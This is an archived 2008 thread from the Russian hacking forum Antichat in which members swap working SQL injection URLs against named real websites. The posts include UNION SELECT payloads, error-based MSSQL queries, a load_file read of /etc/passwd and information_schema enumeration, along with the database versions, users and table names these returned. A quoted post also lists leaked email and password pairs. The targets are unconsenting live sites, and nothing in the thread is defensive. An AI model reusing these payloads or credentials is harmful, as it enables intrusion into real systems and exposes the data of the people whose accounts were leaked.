ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4461  
Старый 11.01.2008, 22:59
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Цитата:
Сообщение от .Begemot.  
Там 25 столбцов.
я до токо до 20 дошол был(от я лентяй Ы..)
Цитата:
мейл/пароль
top@iv-fr.net/1
npetia@inbox.ru/8kl9mt
pp.majesty@online.ua/dwpa8g
и тд.
сорри... может я тупой, я ввёл твой запрос... и неувидел того что увидел ты...
 
Ответить с цитированием

  #4462  
Старый 11.01.2008, 23:43
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

Код:
http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,email,12+from+subscribers/*
больше ничего интересного в базе нет
Код:
http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,count(email),12+from+subscribers/*
всего 78 строчек
 
Ответить с цитированием

  #4463  
Старый 12.01.2008, 00:50
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Код:
http://www.lazy-games.com/localiz/info.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Код:
http://www.northberwickuk.com/info.php?id=-268+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,1,4,5,7,6,1,1,1,1/*
Код:
http://www.alphaonenow.org/info.php?id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Код:
http://www.cacgrants.org/cuyahoga.arts.and.culture.news.room.php?id=-999'+union+select+1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,0/*
Код:
http://www.br.clicksconnect.com/index.php/riodejaneiro/hotels?id=-9968+union+select+1,2,3,4,load_file(0x2f6574632f706173737764),1,2,3,5,9/*&page=address
Код:
http://www.aha.am/index.php?lang=eng&s=hotels&id=-999+union+select+1,2,3,4,5/*
Код:
http://www.season.com.ua/show_photos.php?table=hotels&id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/*
@_@
 
Ответить с цитированием

  #4464  
Старый 12.01.2008, 00:54
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.aquarius.pl.ua/index.php?pg=vacancies&id=1+UNION+SELECT+1,2,concat(Version(),0x3a,USER(%20%20),0x3a,DATABASE()),4,5,6,7,8/*
аж самого улыбнуло
 
Ответить с цитированием

  #4465  
Старый 12.01.2008, 01:00
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://educasources.education.fr/

Код HTML:
http://educasources.education.fr/selecthema.asp?id=1)+or+1=@@version--
« Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005
Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) »


Код HTML:
http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+db_name())--
« MDC »

Код HTML:
http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+system_user)--
« web »

Все таблицы (в французском не смыслю, не стал проверять содержимое таблиц):

Код HTML:
http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('canal_sceren_ressources','T_LIEN_NIVEAU','Broch_Rubriques','T_REFERENCE','Broch_SousRubriques','tempcedric','Yann_Temp','tempcedric2','CodePrix','tempcedric3','Personnes_panier_admdoc','VIEW1','Cyb_Departement','VIEW2','Cyb_inscrits','vue_app_arch_form1','Date_observatoire','Broch_Prix','vue_app_arch_liste1b','Yann_Temp2','Descriptions_Documentaires','EducaFluxRSS','vue_app_barre','Partenaires','PGI_Champs','Descriptions_Editoriales','EducaRSSPerso','vue_articlerevue','Producteurs_Ressources','old_PGI_Disciplines','Dewey','vue_auteurs','Ressources_Co_Editeurs','PGI_Disponibilite','Dewey_Ressources','2007_cor_2006_2007','vue_bases_revues','old_PGI_Niveaux','Discipline_Option_RJC','motbis_MicroT','vue_bases_videos','Ressources_Partenaires','old_PGI_Supports')--
 
Ответить с цитированием

  #4466  
Старый 12.01.2008, 01:24
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://astrol.ru/index.php?page=-125+union+select+1,2,3,4,5,6,7/*
Не смог ничего вывести
-----------------------------------------------------------------------
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version (),user(),database()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
Все таблицы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+in formation_schema.tables/*
Все колонки:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+i nformation_schema.columns/*
-----------------------------------------------------------------------
http://lit.phil.pu.ru/article.php?id=7+union+select+1,2,3,4,5/*
Пробывал вывести version() user() database() через конверты...не получилось...
-----------------------------------------------------------------------
http://encycl.anthropology.ru/article.php?id=472+union+select+1,concat_ws(0x2f,v ersion(),user(),database()),3,4,5,6,7,8,9,10/*
5.0.45-community-log/anthropo_visitor@localhost/anthropo_encycl
Есть таблица user
Все таблицы:
http://encycl.anthropology.ru/article.php?id=472+union+select+1,table_name,3,4,5 ,6,7,8,9,10+from+information_schema.tables/*
Все колонки:
http://encycl.anthropology.ru/article.php?id=472+union+select+1,column_name,3,4, 5,6,7,8,9,10+from+information_schema.columns/*
-----------------------------------------------------------------------
http://rybalka.zooclub.ru/article.php?id=-105+union+select+concat_ws(0x2f,version(),user(),d atabase()),2,3/*
5.0.45-community-log/zooclub_zooclub@localhost/zooclub_rybalka
Все таблицы:
http://rybalka.zooclub.ru/article.php?id=-105+union+select+table_name,2,3+from+information_s chema.tables/*
Все колонки:
http://rybalka.zooclub.ru/article.php?id=-105+union+select+column_name,2,3+from+information_ schema.columns/*
-----------------------------------------------------------------------
http://www.order.elite-games.ru/article.php?id=-175+union+select+1,2,3,4,concat_ws(0x2f,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*
4.1.21-community-nt/order@localhost/order
 
Ответить с цитированием

  #4467  
Старый 12.01.2008, 13:03
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.orda-clan.ru/comments.php?n=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
помогите не догоняю структуру, дошол до ,50,51/*
 
Ответить с цитированием

  #4468  
Старый 12.01.2008, 13:22
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://orda-clan.ru/comments.php?n=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x2F ,cast(version()+as+binary),cast(database()+as+bina ry),cast(user()+as+binary)),12/*

4.1.11-Debian_4sarge7-log/mihanikus_site/mihanikus_site@85.249.135.3


Доступа к information_schema нет. Еще есть таблицы mihanikus.user, mihanikus.users, orda.user, orda.users - но к ним тоже нету доступа ) Подбирай, возможно найдешь другие интересные таблицы
 
Ответить с цитированием

  #4469  
Старый 12.01.2008, 13:24
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.vkus.by/index.php?n=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x3a,DATABASE()),4,5,6/*
симпатично вышло =)
 
Ответить с цитированием

  #4470  
Старый 12.01.2008, 13:47
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.pilot-film.com/index.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10,11/*
блин опять затупил....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ